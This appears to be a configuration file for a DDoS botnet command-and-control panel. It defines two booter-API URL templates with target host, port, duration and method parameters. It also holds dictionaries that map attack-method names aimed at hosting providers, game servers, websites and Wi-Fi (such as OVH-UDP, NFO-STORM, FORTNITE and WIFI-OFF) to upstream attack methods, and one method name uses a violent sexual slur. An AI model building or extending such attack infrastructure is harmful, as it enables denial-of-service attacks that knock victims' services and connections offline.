

APILINK1 = 'https://api.link/api.php?key=apikeyhere&host={HOST}&port={PORT}&time={TIME}&method={METHOD}'
APILINK2 = 'https://api.link/api.php?key=apikeyhere&host={HOST}&port={PORT}&time={TIME}&method={METHOD}'

#HERE YOU WILL ASSIGN NXLL METHODS TO API METHODS
#USE THIS SYNTAX: "NXLL_METHOD_NAME":"API_METHOD_NAME"
#EXAMPLE: IF YOUR API HAS A METHOD OVH-DOWN AND YOU WANT THAT METHOD TO BE OVH-CRUSH ON YOUR CNC, YOU WOULD ADD: "OVH-CRUSH":"OVH-DOWN", TO THE DICTIONARY

#ALL METHODS MUST BE IN ALL UPPER CASE. DO NOT REPEAT ANY METHOD NAMES (THE FIRST PART BEFORE THE ':', THE SECOND PART CAN BE DUPLICATED)

APIMETHODS1 = {
"NXLL":"METHOD1",
"NFO-SLAP":"METHOD2",
"NGINX":"METHOD3",
"HYDRAV2":"METHOD4",
"FORTNITE":"METHOD5",
"CHOOPA-DOWN":"METHOD6",
"OVH-UDP":"METHOD7",
"SITE":"METHOD8",
"COMBO":"METHOD9",
"WIFI-OFF":"METHOD10",
"100UP":"METHOD11",
"LIFT":"METHOD12",
"SERVER-RAPE":"METHOD13",
"HYDRA-SLEEP":"METHOD14",
"ALL":"METHOD15",
"GAMEOVER":"METHOD16",
"HYDRA":"METHOD17",
"COD":"METHOD18",
"VPS":"METHOD19",
"NFO-STORM":"METHOD20"
}

APIMETHODS2 = {
"NXLL2":"METHOD1",
"NFO-SLAP2":"METHOD2",
"NGINX2":"METHOD3",
"HYDRAV3":"METHOD4",
"FORTNITE2":"METHOD5",
"CHOOPA-DOWN2":"METHOD6",
"OVH-UDP2":"METHOD7",
"SITE2":"METHOD8",
"COMBO2":"METHOD9",
"WIFI-OFF2":"METHOD10",
"100UP2":"METHOD11",
"LIFT2":"METHOD12",
"SERVER-RAPE2":"METHOD13",
"HYDRA-SLEEP2":"METHOD14",
"ALL2":"METHOD15",
"GAMEOVER2":"METHOD16",
"HYDRA2":"METHOD17",
"COD2":"METHOD18",
"VPS2":"METHOD19",
"NFO-STORM2":"METHOD20"
}
